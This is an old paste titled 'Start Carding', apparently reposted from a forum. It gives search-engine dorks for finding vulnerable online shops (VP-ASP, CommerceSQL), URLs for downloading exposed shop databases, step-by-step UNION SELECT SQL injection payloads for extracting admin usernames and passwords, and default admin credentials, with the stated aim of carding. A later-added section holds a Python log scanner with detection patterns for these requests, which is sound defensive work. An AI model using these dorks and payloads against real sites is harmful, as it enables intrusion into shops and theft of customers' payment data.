Netikerty

Start Carding

Mar 6th, 2013
  1. Carding dorks :D
  2. (!)
  3.  
  4. Code:
  5.  
  6. google.com:--> allinurl:/shop/category.asp/catid=
  7. target looks like :--> www.xxxxx.com/shop/category.asp/catid=xxxxxx
  8. exploit :--> /admin/dbsetup.asp
  9. target with exploit :--> www.xxxxxx.com/admin/dbsetup.asp
  10. after getting that page look for dbname and path. (this is also good file sdatapdshoppro.mdb , access.mdb)
  11. target to download the database :--> www.xxxxxx.com/data/pdshoppro.mdb (doesn't need to be like this)
  12. in db look for access to find pass and user of shop admins.
  13.  
  14. (2)
  15. Code:
  16.  
  17. google.com:--> allinurl:/commercesql/
  18. target looks like :--> www.xxxxx.com/commercesql/xxxxx
  19. exploit :--> cgi-bin/commercesql/index.cgi?page=
  20. target with exploit admin config :--> http://www.xxxxxx.co..../admin_conf.pl
  21. target with exploit admin manager :--> http://www.xxxxxx.co....in/manager.cgi
  22. target with exploit order.log :--> http://www.xxxxx.com....iles/order.log
  23.  
  24. (3)
  25. Code:
  26.  
  27. 1/search google: allinurl:"shopdisplayproducts.asp?id=
  28. --->http://victim.com/shopdisplayproducts.asp?id=5
  29.  
  30. 2/find error by adding '
  31. --->http://victim.com/shopdisplayproducts.asp?id=5'
  32.  
  33. --->error: Microsoft JET database engine error "80040e14"...../shop$db.asp, line467
  34.  
  35. -If you don't see error then change id to cat
  36.  
  37. --->http://victim.com/shopdisplayproducts.asp?cat=5'
  38.  
  39. 3/if this shop has error then add this: %20union%20select%201%20from%20tbluser"having%201= 1--sp_password
  40.  
  41. --->http://victim.com/shopdisplayproduct...on%20select%20 1%20from%20tbluser"having%201=1--sp_password
  42.  
  43. --->error: 5' union select 1 from tbluser "having 1=1--sp_password.... The number of column in the two selected tables or queries of a union queries do not match......
  44.  
  45. 4/ add 2,3,4,5,6.......until you see a nice table
  46.  
  47. add 2
  48. ---->http://victim.com/shopdisplayproduct...on%20select%20 1,2%20from%20tbluser"having%201=1--sp_password
  49. then 3
  50. ---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3%20from%20tbluser"having%201=1--sp_password
  51. then 4 ---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3,4%20from%20tbluser"having%201=1--sp_password
  52.  
  53. ...5,6,7,8,9.... until you see a table. (exp:...47)
  54.  
  55. ---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,,43,44,45,46,47%20from%20tbluser" having%201=1--sp_password
  56. ---->see a table.
  57.  
  58.  
  59. 5/When you see a table, change 4 to fldusername and 22 to fldpassword you will have the admin username and password
  60.  
  61. --->http://victim.com/shopdisplayproduct...on%20%20elect% 201,2,3,fldusername,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,fldpassword,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47%20from%20tbluser%22having%201=1--sp_password
  62.  
  63. 6/Find link admin to login:
  64. try this first: http://victim.com/shopadmin.asp
  65. or: http://victim.com/shopadmin.asp
  66.  
  67.  
  68. Didn't work? Then you have to find it yourself:
  69.  
  70. add: (for the above example) '%20union%20select%201,2,3,fieldvalue,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sp_password
  71.  
  72. --->http://victim.com/shopdisplayproduct...n%20select%201 ,2,3,fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sp_password
  73.  
  74.  
  75. you'll see something like: ( lot of them)
  76.  
  77. shopaddmoretocart.asp
  78. shopcheckout.asp
  79. shopdisplaycategories.asp
  80. ..............
  81.  
  82. then guess admin link by adding the above data until you find admin links
  83.  
  84. (4)
  85.  
  86. Code:
  87.  
  88. Type: VP-ASP Shopping Cart
  89. Version: 5.00
  90. Dork = intitle:VP-ASP Shopping Cart 5.00
  91. You will find many websites with VP-ASP 5.00 cart software installed
  92. Now let's get to the exploit..
  93.  
  94. the page will be like this ****://***.victim.com/shop/shopdisplaycategories.asp
  95. The exploit is : diag_dbtest.asp
  96. so do this:
  97. ****://***.victim.com/shop/diag_dbtest.asp
  98.  
  99. A page will appear with something like:
  100.  
  101. xDatabase
  102. shopping140
  103.  
  104. xDblocation
  105. resx
  106.  
  107. xdatabasetype xEmail xEmailName xEmailSubject xEmailSystem xEmailType xOrdernumber .:. EXAMPLE .:.
  108. the most important thing here is xDatabase
  109. xDatabase: shopping140
  110. ok now the URL will be like this:
  111. ****://***.victim.com/shop/shopping140.mdb
  112. if you didn't download the Database..
  113. Try this while there is dblocation.
  114. xDblocation
  115. resx
  116.  
  117. the url will be:
  118. ****://***.victim.com/shop/resx/shopping140.mdb
  119. If you see the error message you have to try this :
  120. ****://***.victim.com/shop/shopping500.mdb
  121.  
  122. download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at download.com
  123.  
  124. inside you should be able to find *** information.
  125. and you should even be able to find the admin username and password for the website.
  126.  
  127. the admin login page is usually located here
  128. ****://***.victim.com/shop/shopadmin.asp
  129.  
  130. if you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all then try to find the admin login page and enter the default passwords which are
  131.  
  132. Username: admin
  133. password: admin
  134. OR
  135. Username: vpasp
  136. password: vpasp
  137.  
  138. This isn´t mine ¬¬
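
Added for defenders, not part of the original paste: a scan of web access logs for the request patterns listed above (diagnostic and setup pages, `.mdb` downloads, the CommerceSQL admin files, and the `union select` / `sp_password` strings). The log lines, addresses, rule names and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Indicators taken from the request patterns listed in the paste above.
RULES = [
    ("db-file-download", re.compile(r"\.mdb(?:$|\?)", re.I)),
    ("diagnostic-or-setup-page", re.compile(r"/(?:diag_dbtest|dbsetup)\.asp", re.I)),
    ("commercesql-admin-file", re.compile(r"admin_conf\.pl|manager\.cgi|order\.log", re.I)),
    ("sqli-union-select", re.compile(r"union\s+select", re.I)),
    ("sqli-sp_password-marker", re.compile(r"sp_password", re.I)),
]

# Common Log Format: host ident user [time] "METHOD target PROTO" status size
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (.*?) HTTP/[\d.]+" (\d{3}) \S+')

# Constructed sample lines (documentation IP ranges, hypothetical shop paths).
SAMPLE_LOG = [
    '198.51.100.7 - - [06/Mar/2013:10:00:01 +0000] "GET /shop/shopdisplaycategories.asp HTTP/1.1" 200 5120',
    '198.51.100.7 - - [06/Mar/2013:10:00:05 +0000] "GET /shop/diag_dbtest.asp HTTP/1.1" 200 812',
    '198.51.100.7 - - [06/Mar/2013:10:00:09 +0000] "GET /shop/shopping140.mdb HTTP/1.1" 404 0',
    '203.0.113.9 - - [06/Mar/2013:10:02:11 +0000] "GET /shopdisplayproducts.asp'
    '?id=5%27%20union%20select%201%20from%20tbluser--sp_password HTTP/1.1" 500 301',
    '192.0.2.44 - - [06/Mar/2013:10:03:00 +0000] "GET /shop/shopcheckout.asp HTTP/1.1" 200 2048',
]


def scan(lines):
    """Return (client, status, rule, decoded_target) for every rule a request matches."""
    hits = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue  # not a CLF request line
        client, _method, target, status = m.groups()
        decoded = unquote_plus(target)  # normalise %20 and + before matching
        for name, rx in RULES:
            if rx.search(decoded):
                hits.append((client, int(status), name, decoded))
    return hits


def served(hits):
    """Hits answered with 200: the server returned content, so review for exposure."""
    return [h for h in hits if h[1] == 200]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A 200 response on a diagnostic page or any `.mdb` path means the file is reachable from the web: remove the diagnostic and setup pages, keep the database file outside the web root, and replace the default admin credentials.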